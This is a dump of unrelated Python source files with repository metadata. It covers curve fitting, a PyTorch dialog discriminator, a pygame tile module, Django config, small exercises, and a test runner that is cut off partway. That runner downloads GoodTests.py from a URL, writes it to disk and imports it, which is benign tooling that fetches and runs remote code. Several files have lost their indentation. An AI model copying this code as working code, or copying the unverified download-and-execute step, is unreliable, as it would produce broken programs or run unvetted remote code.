self.MethodName = 'Gamma Variate Function fitting'
self.MethodDescription = '...'
# ------------------------------
# Convert signal intensity curve to concentration curve
# Assuming parmagnetic contrast media (e.g. Gd-DTPA)
def SignalToConcent(self, signal):
cont = signal / signal[0] - 1.0
return cont
# ------------------------------
# Convert concentration curve to signal intensity curve
def ConcentToSignal(self, concent):
signal = (concent + 1.0) * self.TargetCurve[0, 1]
return signal
# ------------------------------
# Definition of the function
def Function(self, x, param):
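        # Gamma variate: y(t) = Sp * (e/(alpha*beta))**alpha * (t-Ta)**alpha
        #                * exp(-(t-Ta)/beta) + S0,
        # so the peak above the baseline S0 has height Sp at t = Ta + alpha*beta.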
Sp, alpha, beta, Ta, S0 = param
y = Sp * numpy.abs(scipy.power((scipy.e / (alpha*beta)), alpha)) * numpy.abs(scipy.power((x-Ta), alpha)) * scipy.exp(-(x-Ta)/beta) + S0
return y
# ------------------------------
# Calculate the output parameters (called by GetOutputParam())
def CalcOutputParam(self, param):
Sp, alpha, beta, Ta, S0 = param
sts = quad(lambda x: x*(self.Function(x, param) - S0), 0.0, 100.0)
ss = quad(lambda x: self.Function(x, param) - S0, 0.0, 100.0)
        # quad returns a (value, abserr) pair, so compare the integral value
        if ss[0] != 0.0:
            MTT = sts[0] / ss[0]
        else:
            MTT = 0.0
dict = {}
dict['MTT'] = MTT
dict['Sp'] = Sp
#dict['alpha'] = alpha
#dict['beta'] = beta
#dict['Ta'] = Ta
#dict['S0'] = S0
return dict
|
[
"tokuda@5e132c66-7cf4-0310-b4ca-cd4a7079c2d8"
] |
tokuda@5e132c66-7cf4-0310-b4ca-cd4a7079c2d8
|
4dc527e0d25970a1dd5729429b4c49f2b26b84a8
|
b144cb0c9e497136c99e608c1cf3cf0b2e0e3c2d
|
/D3Q/src/deep_dialog/controller/discriminator.py
|
c41b0977a9d25d99e2f92a3f40d2c69110e8124f
|
[] |
no_license
|
loremdai/A2C_PPO
|
924182d780836a4774bc304c0bb460a1ef22c143
|
f8135e4f9e3109a8861166b05f2090a1389188a9
|
refs/heads/master
| 2023-06-02T10:52:34.839587
| 2021-06-30T09:56:54
| 2021-06-30T09:56:54
| 381,645,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,653
|
py
|
'''
created on Mar 13, 2018
@author: Shang-Yu Su (t-shsu)
'''
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.utils import clip_grad_norm_
import torch.optim as optim
import numpy as np
import random
from deep_dialog import dialog_config
use_cuda = torch.cuda.is_available()
class Discriminator(nn.Module):
def __init__(self, input_size=100, hidden_size=128, output_size=1, nn_type="MLP", movie_dict=None, act_set=None, slot_set=None, start_set=None, params=None):
super(Discriminator, self).__init__()
#############################
# misc setting #
#############################
self.movie_dict = movie_dict
self.act_set = act_set
self.slot_set = slot_set
self.start_set = start_set
self.act_cardinality = len(act_set.keys())
self.slot_cardinality = len(slot_set.keys())
self.feasible_actions = dialog_config.feasible_actions # for agent
self.feasible_actions_users = dialog_config.feasible_actions_users # for user
self.num_actions = len(self.feasible_actions)
self.num_actions_user = len(self.feasible_actions_users)
self.max_turn = params['max_turn'] + 5
self.state_dimension = 213
self.hidden_size = hidden_size
self.cell_state_dimension = 213
self.nn_type = nn_type
self.threshold_upperbound = 0.55
self.threshold_lowerbound = 0.45
#############################
# model setting #
#############################
# (1) MLP discriminator (2) RNN discriminator
# (3) RNN encoder -> MLP discriminator
if nn_type == "MLP":
self.model = nn.Sequential(nn.Linear(self.state_dimension, hidden_size), nn.ELU(), nn.Linear(hidden_size, output_size), nn.Sigmoid())
elif nn_type == "RNN":
self.transform_layer = nn.Linear(self.cell_state_dimension, hidden_size)
self.model = nn.LSTM(126, hidden_size, 1, dropout=0.00, bidirectional=False)
self.output_layer = nn.Sequential(nn.Linear(hidden_size, output_size), nn.Sigmoid())
self.user_model_experience_pool = list()
self.user_experience_pool = list()
# hyperparameters
self.max_norm = 1
lr = 0.001
# optimizer & loss functions
self.BCELoss = nn.BCELoss()
if nn_type == "MLP":
self.optimizer = optim.RMSprop(self.model.parameters(), lr=lr)
elif nn_type == "RNN":
params = []
params.extend(list(self.transform_layer.parameters()))
params.extend(list(self.model.parameters()))
params.extend(list(self.output_layer.parameters()))
self.optimizer = optim.RMSprop(params, lr=lr) # optimize the parameters of all three layers
if use_cuda:
self.cuda()
# store simulated experience generated by the world model
def store_user_model_experience(self, experience):
self.user_model_experience_pool.append(experience)
if len(self.user_model_experience_pool) > 10000: # when the pool is full, keep only the most recent experience
self.user_model_experience_pool = self.user_model_experience_pool[-9000:]
def store_user_experience(self, experience):
self.user_experience_pool.append(experience)
if len(self.user_experience_pool) > 10000:
self.user_experience_pool = self.user_experience_pool[-9000:]
def Variable(self, x):
return Variable(x, requires_grad=False).cuda() if use_cuda else Variable(x, requires_grad=False)
# discriminate a batch
def forward(self, experience=[]):
if self.nn_type == "MLP":
# define the policy here
d = [self.discriminate(exp).data.cpu().numpy()[0] for exp in experience]
# NOTE: be careful
if np.mean(d) < self.threshold_upperbound and np.mean(d) > self.threshold_lowerbound: # if the mean discriminator output falls between the lower and upper thresholds
return True
else:
return False
elif self.nn_type == "RNN":
# define the policy here
d = [self.discriminate(exp).data.cpu().numpy()[0][0] for exp in experience]
# NOTE: be careful
if np.mean(d) < self.threshold_upperbound and np.mean(d) > self.threshold_lowerbound:
return True
else:
return False
# check a single experience
def single_check(self, example):
d = self.discriminate(example).data.cpu().numpy()[0]
if d < self.threshold_upperbound and d > self.threshold_lowerbound:
return True
else:
return False
def discriminate(self, example):
if self.nn_type == "MLP":
state = self.prepare_state_representation(example[0])[0] # represent the state
model_input = self.Variable(torch.FloatTensor(state)) # load state representation into pytorch Variable
return self.model(model_input) # feed into MLP model
elif self.nn_type == "RNN":
inputs = self.Variable(torch.FloatTensor([self.prepare_state_representation_for_RNN(history) for history in example[0]['history']]))
h_0 = self.Variable(torch.FloatTensor(self.prepare_initial_state_for_RNN(example[0])))
c_0 = self.Variable(torch.zeros(1, 1, self.hidden_size))
output, hn = self.model(inputs, (self.transform_layer(h_0).unsqueeze(0), c_0))
return self.output_layer(output[-1])
# D(s, a) determines 'how real is the example'
def train_single_batch(self, batch_size=16):
self.optimizer.zero_grad()
loss = 0
# sample positive and negative examples
pos_experiences = random.sample(self.user_experience_pool, batch_size)
neg_experiences = random.sample(self.user_model_experience_pool, batch_size)
for pos_exp, neg_exp in zip(pos_experiences, neg_experiences):
loss += self.BCELoss(self.discriminate(pos_exp), self.Variable(torch.ones(1,1))) + self.BCELoss(self.discriminate(neg_exp), self.Variable(torch.zeros(1,1)))
loss.backward()
clip_grad_norm_(self.parameters(), self.max_norm)
self.optimizer.step()
return loss
def train(self, batch_size=16, batch_num=0): # batch_num determines how many batches to train on
loss = 0
if batch_num == 0: # if batch_num was not specified, derive it from the pool sizes
batch_num = min(len(self.user_experience_pool)//batch_size, len(self.user_model_experience_pool)//batch_size)
for _ in range(batch_num):
loss += self.train_single_batch(batch_size)
return (loss.data.cpu().numpy()/batch_num)
def prepare_state_representation(self, state):
""" Create the representation for each state """
user_action = state['user_action']
current_slots = state['current_slots']
agent_last = state['agent_action']
########################################################################
# Create one-hot of acts to represent the current user action
########################################################################
user_act_rep = np.zeros((1, self.act_cardinality))
user_act_rep[0, self.act_set[user_action['diaact']]] = 1.0
########################################################################
# Create bag of inform slots representation to represent the current user action
########################################################################
user_inform_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['inform_slots'].keys():
user_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Create bag of request slots representation to represent the current user action
########################################################################
user_request_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['request_slots'].keys():
user_request_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Creat bag of filled_in slots based on the current_slots
########################################################################
current_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in current_slots['inform_slots']:
current_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent act
########################################################################
agent_act_rep = np.zeros((1, self.act_cardinality))
if agent_last:
agent_act_rep[0, self.act_set[agent_last['diaact']]] = 1.0
########################################################################
# Encode last agent inform slots
########################################################################
agent_inform_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['inform_slots'].keys():
agent_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent request slots
########################################################################
agent_request_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['request_slots'].keys():
agent_request_slots_rep[0, self.slot_set[slot]] = 1.0
# turn_rep = np.zeros((1, 1)) + state['turn'] / 10.
turn_rep = np.zeros((1, 1))
########################################################################
# One-hot representation of the turn count?
########################################################################
turn_onehot_rep = np.zeros((1, self.max_turn))
turn_onehot_rep[0, state['turn']] = 1.0
self.final_representation = np.hstack([user_act_rep, user_inform_slots_rep, user_request_slots_rep, agent_act_rep, agent_inform_slots_rep, agent_request_slots_rep, current_slots_rep, turn_rep, turn_onehot_rep])
return self.final_representation
def prepare_initial_state_for_RNN(self, state):
user_action = state['user_action']
current_slots = state['current_slots']
agent_last = state['agent_action']
########################################################################
# Create one-hot of acts to represent the current user action
########################################################################
user_act_rep = np.zeros((1, self.act_cardinality))
user_act_rep[0, self.act_set[user_action['diaact']]] = 1.0
########################################################################
# Create bag of inform slots representation to represent the current user action
########################################################################
user_inform_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['inform_slots'].keys():
user_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Create bag of request slots representation to represent the current user action
########################################################################
user_request_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['request_slots'].keys():
user_request_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Creat bag of filled_in slots based on the current_slots
########################################################################
current_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in current_slots['inform_slots']:
current_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent act
########################################################################
agent_act_rep = np.zeros((1, self.act_cardinality))
if agent_last:
agent_act_rep[0, self.act_set[agent_last['diaact']]] = 1.0
########################################################################
# Encode last agent inform slots
########################################################################
agent_inform_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['inform_slots'].keys():
agent_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent request slots
########################################################################
agent_request_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['request_slots'].keys():
agent_request_slots_rep[0, self.slot_set[slot]] = 1.0
# turn_rep = np.zeros((1, 1)) + state['turn'] / 10.
turn_rep = np.zeros((1, 1))
########################################################################
# One-hot representation of the turn count?
########################################################################
turn_onehot_rep = np.zeros((1, self.max_turn))
turn_onehot_rep[0, state['turn']] = 1.0
self.final_representation = np.hstack([user_act_rep, user_inform_slots_rep, user_request_slots_rep, agent_act_rep, agent_inform_slots_rep, agent_request_slots_rep, current_slots_rep, turn_rep, turn_onehot_rep])
return self.final_representation
# {'request_slots': {'theater': 'UNK'}, 'turn': 0, 'speaker': 'user', 'inform_slots': {'numberofpeople': '3', 'moviename': '10 cloverfield lane'}, 'diaact': 'request'}
def prepare_state_representation_for_RNN(self, state):
########################################################################
# Create one-hot of acts to represent the current user action
########################################################################
user_act_rep = np.zeros((1, self.act_cardinality))
if state['speaker'] == 'user':
user_act_rep[0, self.act_set[state['diaact']]] = 1.0
########################################################################
# Create bag of inform slots representation to represent the current user action
########################################################################
user_inform_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in state['inform_slots'].keys():
user_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Create bag of request slots representation to represent the current user action
########################################################################
user_request_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in state['request_slots'].keys():
user_request_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent act
########################################################################
agent_act_rep = np.zeros((1, self.act_cardinality))
if state['speaker'] == 'agent':
agent_act_rep[0, self.act_set[state['diaact']]] = 1.0
turn_rep = np.zeros((1, 1))
########################################################################
# One-hot representation of the turn count?
########################################################################
turn_onehot_rep = np.zeros((1, self.max_turn))
turn_onehot_rep[0, state['turn']] = 1.0
self.final_representation = np.hstack([user_act_rep, user_inform_slots_rep, user_request_slots_rep, agent_act_rep, turn_rep, turn_onehot_rep])
return self.final_representation
|
[
"etienn3dai@gmail.com"
] |
etienn3dai@gmail.com
|
406e35ae24ec2980a846e1ed4635bfff5afb80e2
|
f96bb6344180322fbef067d611aab9cb5ceeea38
|
/Занятие2/Практические_задания/task4_1/main.py
|
d57d450b0fe7935664b2e222e8f44f7c84ae2662
|
[] |
no_license
|
Irina1207/PythonPY100
|
485247ce32e52f388d863ddd8dbc7788278e6f38
|
7525d09fc7d8e701768e3b0cc6fed111f5d2ae1a
|
refs/heads/master
| 2023-09-02T11:10:06.079356
| 2021-10-28T18:14:37
| 2021-10-28T18:14:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,387
|
py
|
if __name__ == "__main__":
list_ = [4, -1, 10, -1, 3, -3, -6, 8, 6, 9]
# assume the first element of the list is the minimum
min_value = list_[0]
# then walk through the whole list, looking for an element smaller than the minimum found so far
for current_value in list_:
# if the current value is smaller than the minimum, overwrite the minimum
print("Current minimum value", min_value)
print("Current element", current_value)
# if we found an element smaller than the previously found minimum, overwrite it
if current_value < min_value: # TODO: write the condition
print("Found an element smaller than the minimum")
min_value = current_value # TODO: if found, what do we do?
print("-" * 10)
# after walking through the whole list, print the list and the minimum element
print(list_)
print("Minimum element =", min_value)
|
[
"IraL122@mail.ru"
] |
IraL122@mail.ru
|
e2d5d28a24440c5334d98be69fadd9129afe7b63
|
5c4fb3edc23ae4d8c67af73c66ff806760a4f83b
|
/assignment_3mw/wsgi.py
|
02345b5583ee116e784c4fe2f57b4d6b500443bf
|
[] |
no_license
|
tomhoule/django-assignment
|
36b1ab5159e8fd9e577e09c9721902076fac3695
|
dfd9a38fd2a70a919dc0d7d503d7cdb8fd071918
|
refs/heads/master
| 2020-04-17T05:45:30.805835
| 2016-08-21T16:20:36
| 2016-08-21T16:20:36
| 66,184,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
"""
WSGI config for assignment_3mw project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "assignment_3mw.settings")
application = get_wsgi_application()
|
[
"tom@kafunsho.be"
] |
tom@kafunsho.be
|
259792a2153afb2d2d607239fcc9103a8d25a836
|
e767a79412c578da8515fe3dd4797e6915177633
|
/scraperBuild
|
d3e9c47dfefb290004477bd3843e17b9f0d7c062
|
[] |
no_license
|
stajama/CodingBatProject
|
38686f17aa7db993c3bfc869f6ad70ed5abb2719
|
5bc29c61ba796ad0447d8a0402600368698f5b68
|
refs/heads/master
| 2021-09-13T03:52:40.537769
| 2018-04-24T17:20:20
| 2018-04-24T17:20:20
| 105,554,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,460
|
#!/usr/bin/env python3
def descriptionFormatter(descriptionString):
out = "// "
for i in range(len(descriptionString)):
if i % 79 == 0:
out += "\n// "
out += descriptionString[i]
return out
def mainDeal(dictOfInfo):
outFile = open('workfile.txt', "w")
outFile2 = open('testfile.txt', 'w')
for section in dictOfInfo:
outFile.write("// --- {0}\n\n\n".format(section))
# outFile2.write("// --- {0}\n\n\n".format(section))
for problem in dictOfInfo[section]:
outFile.write("// {}\n\n".format(problem))
# solution = dictOfInfo[section][problem]["solution"]
# solution = solution[ : solution.find("{") + 1] + "\n" + \
# descriptionFormatter(dictOfInfo[section][problem]["description"]) + \
# solution[solution.find("{") + 1 : ] + "\n\n"
solution = descriptionFormatter(dictOfInfo[section][problem]["description"])
outFile.write(solution)
# outFile2.write("// {}\n\n@Test\npublic void {0}Test() {\n\tAnswer answer = new Answer();\n\n".format(problem))
# for assertion in dictOfInfo[section][problem]["tests"]:
# # structure should be (function input, expected output)
# outFile2.write("\tassertEquals(answer.{0}({1}))equals({2}, \"Error in {0}\");\n")
# outFile2.write("\t}\n}\n\n")
outFile.close()
return
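# --- Hedged usage sketch (added): the dictOfInfo structure below is inferred
# --- from the lookups above (section -> problem -> {"description", "tests", "solution"}) ---
if __name__ == "__main__":
    demo = {"Warmup-1": {"sleepIn": {"description": "x" * 200, "tests": [], "solution": ""}}}
    mainDeal(demo)  # writes workfile.txt with the wrapped description comments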
|
[
"stajama@yahoo.com"
] |
stajama@yahoo.com
|
|
36eeb74417934b69ae6ab04042a025ddef8be960
|
69624d985735fdb8fa6e4af620c44ca3d5719dc9
|
/ethernet_game_picture_tile_library.py
|
c05885e4815bceadf6172455a6d2d9a0daa2db85
|
[] |
no_license
|
DorsaiFeydakin/Ethernet_Pygame_Board
|
f4162b36d1648e2b0ece6f5ad50b62e796ebb87d
|
efbb274c9abf32b1e7ae417ac00adac34b76c161
|
refs/heads/master
| 2022-08-02T15:38:26.868029
| 2020-05-20T06:55:35
| 2020-05-20T06:55:35
| 265,217,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,775
|
py
|
#PyGame_OOPs_Programming_8
# Write your code here :-)
#ethernet_game_image/drawn objects file
import pygame
pygame.init()
window_width=800
window_height=500
WHITE = (255,255,255)
BLACK = (0,0,0)
RED = (255,0,0)
LIME = (0,255,0)
BLUE = (0,0,255)
YELLOW = (255,255,0)
CYAN = (0,255,255)
MAGENTA = (255,0,255)
SILVER = (192,192,192)
GRAY = (128,128,128)
MAROON = (128,0,0)
OLIVE = (128,128,0)
GREEN = (0,128,0)
PURPLE = (128,0,128)
TEAL = (0,128,128)
NAVY = (0,0,128)
#Origin Tile Variables
pictile_x_position = 50
pictile_y_position = 100
pictile_width = 100
pictile_height = 100
pictile_colour = BLUE
piclabel = "new"
dice_tile_x_position = 50
dice_tile_y_position = 100
dice_tile_width = 100
dice_tile_height = 100
dice_tile_colour = RED
dice_tile_label = "Go On"
class Picture_Tile(pygame.sprite.Sprite): # inherit from Sprite so the Sprite.__init__ call below is valid
def __init__(self, pictile_x_position,pictile_y_position, pictile_width, pictile_height ):
pygame.sprite.Sprite.__init__(self)
self.pictile_width = pictile_width
self.pictile_height = pictile_height
self.image = pygame.image.load("./Test_tile_image1.png")
self.image = pygame.transform.scale(self.image,(self.pictile_width,self.pictile_height))#Transform and scale functions resize a .png image
self.image_rect = self.image.get_rect()
self.image_rect.x = pictile_x_position # position the tile at the requested coordinates
self.image_rect.y = pictile_y_position
self.rect = self.image.get_rect( )#retrieves tuple rectangle/surface data (x, y, width, height)
self.rect = (self.rect.x , self.rect.y)
#self.tile_image = pygame.Surface((self.tile_width,self.tile_height)) #Creates a Surface((width,height)) Surfaces can be hardware accelerated
#self.tile_image.fill(self.tile_colour) #fill the tile_surface with a colour (R,G,B)
#pic_tile_1 = Picture_Tile(pictile_x_position,pictile_y_position, pictile_width, pictile_height )
def Roll_It(dice_roll):
dice_roll = dice_roll
rollCount = 0
dice_list =[pygame.image.load("./Test_tile_image1.png"),
pygame.image.load("./Test_tile_image2.png"),
pygame.image.load("./Test_tile_image3.png"),
pygame.image.load("./Test_tile_image4.png"),
pygame.image.load("./Test_tile_image5.png"),
pygame.image.load("./Test_tile_image6.png") ]
if rollCount + 1 >= 30: # if rollCount exceeded 30, indexing dice_list would raise an IndexError... hence the reset
rollCount = 0 #30 frames / 6 images = 5 images per second???
if dice_roll:
window.blit(dice_list[rollCount//5], (300,300))
rollCount += 1
|
[
"noreply@github.com"
] |
DorsaiFeydakin.noreply@github.com
|
35e4c6d766829bc2ef91b3a057c4e81b72a53492
|
142c8772f894ec71e9ca78cb00842e7aaf3f497a
|
/basic-timer.py
|
63c847130e274725338ea06febe1d48b786b4b51
|
[] |
no_license
|
iamshanu14/timer
|
7e8fe83bdab055a37ce01339cec3a7df3f9921ae
|
27050dfe01e8c74dff7121253aff711f77d49c60
|
refs/heads/master
| 2022-12-07T17:38:46.364147
| 2020-09-01T08:31:23
| 2020-09-01T08:31:23
| 291,774,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
import time
for hour in range(0, 24):
for minute in range(0, 60):
for second in range(0, 60):
print("{}:{}:{}" . format(hour, minute, second))
time.sleep(1)
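# A hedged alternative sketch (added, not in the original): derive h:m:s from a
# single running second counter with divmod.
# for total in range(24 * 60 * 60):
#     hour, rem = divmod(total, 3600)
#     minute, second = divmod(rem, 60)
#     print("{}:{}:{}".format(hour, minute, second))
#     time.sleep(1)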
|
[
"66065871+shanu14@users.noreply.github.com"
] |
66065871+shanu14@users.noreply.github.com
|
7216b0c7a8159a4c9e828f2233642a74ced03bf0
|
3186db1413e39be886fa0067e102b2addd73f4d8
|
/FP/P2_GestiuneLaboratoareStudenti/main.py
|
a312f20f1510abf858d09828a6c66c4cad3d2134
|
[] |
no_license
|
elenamaria0703/MyProjects
|
516624425396814b37bfce249d4989aaabbc43a0
|
ed8c94a30c1ff9250a7d4ff2f1321b2bb598fdc6
|
refs/heads/master
| 2021-03-02T05:14:20.427516
| 2020-06-16T14:07:55
| 2020-06-16T14:07:55
| 245,840,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
from repo.Repository import RepositoryStudents,RepositoryProbls,RepositoryAsign
from repo.FileRepositoies import FileRepositoryStudents,FileRepositoryProbls,FileRepositoryAsign
from valid.Validators import StudentiValidator, ProblLabValidator,AsignareValidator
from business.Controllers import StudentiService, ProblLabService,AsignareService
from ui.Console import Console
from business import Controllers
#repoStudents = RepositoryStudents()
#repoProbls = RepositoryProbls()
repoStudents = FileRepositoryStudents("C:\\Users\\Maria\\eclipse-workspace\\P2_GestiuneLaboratoareStudenti.zip_expanded\\P2_GestiuneLaboratoareStudenti\\studentFile.txt")
repoProblLab = FileRepositoryProbls("C:\\Users\\Maria\\eclipse-workspace\\P2_GestiuneLaboratoareStudenti.zip_expanded\\P2_GestiuneLaboratoareStudenti\\problsFile.txt")
#repoAsignare = RepositoryAsign()
repoAsignare = FileRepositoryAsign("C:\\Users\\Maria\\eclipse-workspace\\P2_GestiuneLaboratoareStudenti.zip_expanded\\P2_GestiuneLaboratoareStudenti\\asignareFile.txt")
validatorStudenti = StudentiValidator()
validatorProblLab = ProblLabValidator()
validatorAsignare = AsignareValidator()
serviceProblLab = ProblLabService(repoProblLab,validatorProblLab)
serviceStudenti = StudentiService(repoStudents,validatorStudenti)
serviceAsignare = AsignareService(repoStudents,repoProblLab,repoAsignare,validatorAsignare)
console = Console(serviceStudenti,serviceProblLab,serviceAsignare)
#serviceStudenti.RandomStudent()
#serviceProblLab.RandomProblLab()
console.run()
|
[
"elenamaria0703@users.noreply.github.com"
] |
elenamaria0703@users.noreply.github.com
|
6dd73fa6654aafaa3eb2674d985b5cc5983539da
|
f6a9b8f5aea2a68294e93b396eb9d0bc6755403c
|
/tests/runTests.py
|
00a390aaadeb529599567d6bb4fa00370a42a7bc
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
knu2xs/cmp_version
|
e6b51c230e6914e5ed0f6d57d801b90f1ec8e674
|
bc295e175040684308bcc24c56ee8761825adeed
|
refs/heads/master
| 2022-01-08T22:00:26.290274
| 2018-04-18T00:41:48
| 2018-04-18T00:41:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,768
|
py
|
#!/usr/bin/env python
#
# Copyright (c) 2015, 2016, 2017 Tim Savannah under following terms:
# You may modify and redistribe this script with your project
#
# It will download the latest GoodTests.py and use it to execute the tests.
#
# This should be placed in a directory, "tests", at the root of your project. It assumes that ../$MY_PACKAGE_MODULE is the path to your test module, and will create a symlink to it in order to run tests.
# The tests should be found in $MY_TEST_DIRECTORY in given "tests" folder.
# NOTE: Since version 1.2.3, you can also import this (like from a graphical application) and call the "main()" function.
# All of the following globals are the defaults, but can be overridden when calling main() (params have the same name as the globals).
import imp
import os
import subprocess
import sys
# URL to current version of GoodTests.py - You only need to change this if you host an internal copy.
GOODTESTS_URL = 'https://raw.githubusercontent.com/kata198/GoodTests/master/GoodTests.py'
# This should be your module name, and can be any relative or absolute path, or just a module name.
# If just a module name is given, the directory must be in current directory or parent directory.
MY_PACKAGE_MODULE = 'cmp_version'
# Normally, you want to test the codebase during development, so you don't care about the site-packages installed version.
# If you want to allow testing with any module by @MY_PACKAGE_MODULE in the python path, change this to True.
ALLOW_SITE_INSTALL = False
# This is the test directory that should contain all your tests. This should be a directory in your "tests" folder
MY_TEST_DIRECTORY = 'cmp_version_Tests'
__version__ = '2.2.0'
__version_tuple__ = (2, 2, 0)
def findGoodTests():
'''
findGoodTests - Tries to find GoodTests.py
@return <dict> {
'path' <str> -> Path to GoodTests.py (for execution)
'success' <bool> -> True/False if we successfully found GoodTests.py
}
'''
pathSplit = os.environ['PATH'].split(':')
if '.' not in pathSplit:
pathSplit = ['.'] + pathSplit
os.environ['PATH'] = ':'.join(pathSplit)
result = ''
success = False
for path in pathSplit:
if path.endswith('/'):
path = path[:-1]
guess = path + '/GoodTests.py'
if os.path.exists(guess):
success = True
result = guess
break
return {
'path' : result,
"success" : success
}
def findExecutable(execName):
'''
findExecutable - Search PATH for an executable
@return <dict> {
'path' <str> -> Path to executable (if found, see "success")
'success' <bool> -> True/False if we successfully found requested executable
}
'''
pathSplit = os.environ['PATH'].split(':')
if '.' not in pathSplit:
pathSplit = ['.'] + pathSplit
os.environ['PATH'] = ':'.join(pathSplit)
result = ''
success = False
for path in pathSplit:
if path.endswith(os.sep):
path = path[:-1]
guess = path + os.sep + execName
if os.path.exists(guess):
success = True
result = guess
break
return {
"path" : result,
"success" : success
}
def findGoodTests():
return findExecutable('GoodTests.py')
def try_pip_install():
'''
try to pip install GoodTests.py
First, try via pip module.
If that fails, try to locate pip by dirname(current python executable) + os.sep + pip
If that does not exist, scan PATH for pip
If found a valid pip executable, invoke it to install GoodTests
otherwise, fail.
'''
didImport = False
try:
import pip
didImport = True
except:
pass
if didImport is True:
print ( "Found pip as module=pip")
res = pip.main(['install', 'GoodTests'])
if res == 0:
return 0
sys.stderr.write('Failed to install GoodTests via pip module. Falling back to pip executable...\n\n')
pipPath = os.path.dirname(sys.executable) + os.sep + 'pip'
print ( 'Searching for pip at "%s"' %(pipPath, ) )
if not os.path.exists(pipPath):
print ( '"%s" does not exist. Scanning PATH to locate a usable pip executable' %(pipPath, ))
pipPath = None
searchResults = findExecutable('pip')
if not searchResults['success']:
sys.stderr.write('Failed to find a usable pip executable in PATH.\n')
return 1 # Failed to locate a usable pip
pipPath = searchResults['path']
print ( 'Found pip executable at "%s"' %(pipPath, ) )
print ( "Executing: %s %s 'install' 'GoodTests'" %(sys.executable, pipPath) )
pipe = subprocess.Popen([sys.executable, pipPath, 'install', 'GoodTests'], shell=False, env=os.environ)
res = pipe.wait()
return res
def download_goodTests(GOODTESTS_URL=None):
'''
download_goodTests - Attempts to download GoodTests, using the default global url (or one provided).
@return <int> - 0 on success (program should continue), otherwise non-zero (program should abort with this exit status)
'''
if GOODTESTS_URL is None:
GOODTESTS_URL = globals()['GOODTESTS_URL']
validAnswer = False
while validAnswer == False:
sys.stdout.write('GoodTests not found. Would you like to install it to local folder? (y/n): ')
sys.stdout.flush()
answer = sys.stdin.readline().strip().lower()
if answer not in ('y', 'n', 'yes', 'no'):
continue
validAnswer = True
answer = answer[0]
if answer == 'n':
sys.stderr.write('Cannot run tests without installing GoodTests. http://pypi.python.org/pypi/GoodTests or https://github.com/kata198/Goodtests\n')
return 1
try:
import urllib2 as urllib
except ImportError:
try:
import urllib.request as urllib
except:
sys.stderr.write('Failed to import urllib. Trying pip.\n')
res = try_pip_install()
if res != 0:
sys.stderr.write('Failed to install GoodTests with pip or direct download. aborting.\n')
return 1
try:
response = urllib.urlopen(GOODTESTS_URL)
contents = response.read()
if str != bytes:
contents = contents.decode('ascii')
except Exception as e:
sys.stderr.write('Failed to download GoodTests.py from "%s"\n%s\n' %(GOODTESTS_URL, str(e)))
sys.stderr.write('\nTrying pip.\n')
res = try_pip_install()
if res != 0:
sys.stderr.write('Failed to install GoodTests with pip or direct download. aborting.\n')
return 1
try:
with open('GoodTests.py', 'w') as f:
f.write(contents)
except Exception as e:
sys.stderr.write('Failed to write to GoodTests.py\n%s\n' %(str(e,)))
return 1
try:
os.chmod('GoodTests.py', 0o775)
except:
sys.stderr.write('WARNING: Failed to chmod +x GoodTests.py, may not be able to be executed.\n')
try:
import GoodTests
except ImportError:
sys.stderr.write('Seemed to download GoodTests okay, but still cannot import. Aborting.\n')
return 1
return 0
def main(thisDir=None, additionalArgs=[], MY_PACKAGE_MODULE=None, ALLOW_SITE_INSTALL=None, MY_TEST_DIRECTORY=None, GOODTESTS_URL=None):
'''
Do the work - Try to find GoodTests.py, else prompt to download it, then run the tests.
@param thisDir <None/str> - None to use default (directory this test file is in, or if not obtainable, current directory).
@param additionalArgs <list> - Any additional args to pass to GoodTests.py
Remainder of params take their global (top of file) defaults unless explicitly set here. See top of file for documentation.
@return <int> - Exit code of application. 0 on success, non-zero on failure.
TODO: Standardize return codes so external applications can derive failure without parsing error strings.
'''
if MY_PACKAGE_MODULE is None:
MY_PACKAGE_MODULE = globals()['MY_PACKAGE_MODULE']
if ALLOW_SITE_INSTALL is None:
ALLOW_SITE_INSTALL = globals()['ALLOW_SITE_INSTALL']
if MY_TEST_DIRECTORY is None:
MY_TEST_DIRECTORY = globals()['MY_TEST_DIRECTORY']
if GOODTESTS_URL is None:
